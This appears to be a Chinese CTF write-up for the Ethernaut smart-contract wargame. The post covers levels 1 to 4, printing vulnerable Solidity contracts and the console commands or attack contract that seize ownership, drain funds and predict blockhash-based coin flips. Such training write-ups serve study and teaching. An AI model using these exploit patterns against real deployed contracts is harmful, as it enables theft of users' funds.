首页 > 其他分享 >[CTF] Ethernaut靶场 WP (更新中)

[CTF] Ethernaut靶场 WP (更新中)

时间:2023-03-24 19:45:16浏览次数:56  
标签:function sender uint256 msg CTF WP owner Ethernaut public

刚醒,怎么大家都会区块链了啊。这下不得不学了

[Level 1] Hello Ethernaut

比较基础的入门教程

从9给你的提示开始一路往下走就行

image

如下

image

然后直接submit即可

[Level 2] Fallback

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Fallback {

  mapping(address => uint) public contributions;
  address public owner;

  constructor() {
    owner = msg.sender;
    contributions[msg.sender] = 1000 * (1 ether);
  }

  modifier onlyOwner {
        require(
            msg.sender == owner,
            "caller is not the owner"
        );
        _;
    }

  function contribute() public payable {
    require(msg.value < 0.001 ether);
    contributions[msg.sender] += msg.value;
    if(contributions[msg.sender] > contributions[owner]) {
      owner = msg.sender;
    }
  }

  function getContribution() public view returns (uint) {
    return contributions[msg.sender];
  }

  function withdraw() public onlyOwner {
    payable(owner).transfer(address(this).balance);
  }

  receive() external payable {
    require(msg.value > 0 && contributions[msg.sender] > 0);
    owner = msg.sender;
  }
}

如名,考的是fallback function,即合约中的receive()。在不调用任何函数直接向合约发起交易的时候,会自动调用本函数。

本题要求

  1. 成为合约的owner
  2. 转走合约所有的钱

能让owner = msg.sender的函数只有contributereceive。但是由于owner贡献了1000eth,你一次又只能贡献0.001eth,contribution想超过owner显然不可能。于是考虑receive函数,需要你转一点eth,同时contributions大于0即可。那思路就很清晰了,首先contribute转1wei,然后再直接给合约转1wei,即可成为owner。成为owner后调用withdraw即可提走所有的钱。

await contract.contribute.sendTransaction({value:1})
await contract.sendTransaction({value:1})
await contract.owner() // 查看当前owner是否为自己
await contract.withdraw() // 提走所有钱

image

[Level 3] Fallout

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import 'openzeppelin-contracts-06/math/SafeMath.sol';

contract Fallout {
  
  using SafeMath for uint256;
  mapping (address => uint) allocations;
  address payable public owner;


  /* constructor */
  function Fal1out() public payable {
    owner = msg.sender;
    allocations[owner] = msg.value;
  }

  modifier onlyOwner {
	        require(
	            msg.sender == owner,
	            "caller is not the owner"
	        );
	        _;
	    }

  function allocate() public payable {
    allocations[msg.sender] = allocations[msg.sender].add(msg.value);
  }

  function sendAllocation(address payable allocator) public {
    require(allocations[allocator] > 0);
    allocator.transfer(allocations[allocator]);
  }

  function collectAllocations() public onlyOwner {
    msg.sender.transfer(address(this).balance);
  }

  function allocatorBalance(address allocator) public view returns (uint) {
    return allocations[allocator];
  }
}

这道题其实很简单,给Fal1out转账即可(注意是数字1不是字母l)。

await contract.Fal1out.sendTransaction({value:1})

这道题想表达的其实是合约constructor和合约名字的关系和漏洞。

image

[Level 4] Coin Flip

pragma solidity ^0.8.0;

contract CoinFlip {

  uint256 public consecutiveWins;
  uint256 lastHash;
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

  constructor() {
    consecutiveWins = 0;
  }

  function flip(bool _guess) public returns (bool) {
    uint256 blockValue = uint256(blockhash(block.number - 1));

    if (lastHash == blockValue) {
      revert();
    }

    lastHash = blockValue;
    uint256 coinFlip = blockValue / FACTOR;
    bool side = coinFlip == 1 ? true : false;

    if (side == _guess) {
      consecutiveWins++;
      return true;
    } else {
      consecutiveWins = 0;
      return false;
    }
  }
}

block.number是公开通用的,那这里的随机数也不随机了。利用Remix Solidity IDE写一个判断side并调用Coinflip函数的合约即可。部署好后运行10次,让await contract.consecutiveWins()为10即可。

pragma solidity ^0.8.0;

contract CoinFlip {

  uint256 public consecutiveWins;
  uint256 lastHash;
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

  constructor() {
    consecutiveWins = 0;
  }

  function flip(bool _guess) public returns (bool) {
    uint256 blockValue = uint256(blockhash(block.number - 1));

    if (lastHash == blockValue) {
      revert();
    }

    lastHash = blockValue;
    uint256 coinFlip = blockValue / FACTOR;
    bool side = coinFlip == 1 ? true : false;

    if (side == _guess) {
      consecutiveWins++;
      return true;
    } else {
      consecutiveWins = 0;
      return false;
    }
  }
}

contract hack {
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;  
  CoinFlip c = CoinFlip(0x1df38aBE66df10C0daAae16f1d4898d127eE0A61);

  function exp() public{
      uint256 blockValue = uint256(blockhash(block.number - 1));
      uint256 coinFlip = blockValue / FACTOR;
      bool side = coinFlip == 1 ? true : false;
      c.flip(side);
  }
}

image

[Level 5] Telephone

标签:function,sender,uint256,msg,CTF,WP,owner,Ethernaut,public
From: https://www.cnblogs.com/timlzh/p/17253060.html

相关文章

  • 【教程】青少年CTF机器人使用教程
    前言本期教程适用于版本号为2.0.1-Beta的青少年CTF机器人,其他版本可能与当前版本不同。由于之前版本的机器人重构,所以我们细化了本次的机器人逻辑,并且对机器人的功能进......
  • WPF下 Console.WriteLine()函数打印的内容不会输出到VS的输出窗口
    问题:在技术群里面看到有人问这样一个问题。.netcore下的wpf项目把框架改成了netframework4.8之后,使用Console.WriteLine的值不会输出到VS的Output窗口这个我想着......
  • WPF 使用Path绘制几何图形
    原创:https://blog.csdn.net/chulijun3107/article/details/105461106/ Path类继承自Shape,可以绘制很多简单的,复合的图形。Path类通过提供的Data属性,Data属性接受一个G......
  • CTF第14天 图片隐写
    给的是bmp图片,猜测是图片隐写拖到Stegsolve.jar中查看rgb低位,发现一串由base64加密的字符串提取出来用在线网站解密即可ZmxhZ3tsNURHcUYxcFB6T2IyTFU5MTlMTWFCWVM1QjFHMDFGR......
  • buuctf.crypto.摩丝
    一道摩斯密码基于单表替换的原理很简单......但是摩斯密码在对照表上不是很完善,导致一些特殊的字符没有统一的规定也就是说,原理一样,但是采用不同的对照表加密的结果......
  • CentOS 7 : wpa_supplicant (CESA-2021:0808) Vulnerability_day 16
    今天要跟大家分享的是关于CentOS的系统缺陷。下面是关于这个问题的具体的描述:TheremoteCentOSLinux7hosthasapackageinstalledthatisaffectedbyavulnerabil......
  • buuctf.crypto.看我回旋踢
    这个题目是和凯斯密码相关的,可以通过flag的一些标志来判断首先我们得到的数据是synt{5pq1004q-86n5-46q8-o720-oro5on0417r1}其中synt是flag在字母表中右移动13位的结......
  • Vue之移动端viewport-vw适配
    一、前置知识vw:与视口的宽度有关,1vw就是视口宽度的1%vh:与视口的高度有关,1vh 就是视口高度的1%vmin:与当下视口的宽度和高度的最小值有关,取值为 vw 和 vh 中......
  • wpf vm prism绑定失败踩的坑
    绑定有两种模式:一种是在app类中继承了:PrismApplication在ConfigureViewModelLocator方法中使用显式指定绑定关系protectedoverridevoidConfigureViewModelLoca......
  • buuctf.pwn.ciscn_2019_n_1
    检测开启了栈不可执行的检测然后拖进IDA分析比较赤裸注意到,我们输入的是num1,但是比较的是num2所以我们需要把num1溢出到num2比较幸运的是,num1在num2的上方(空间......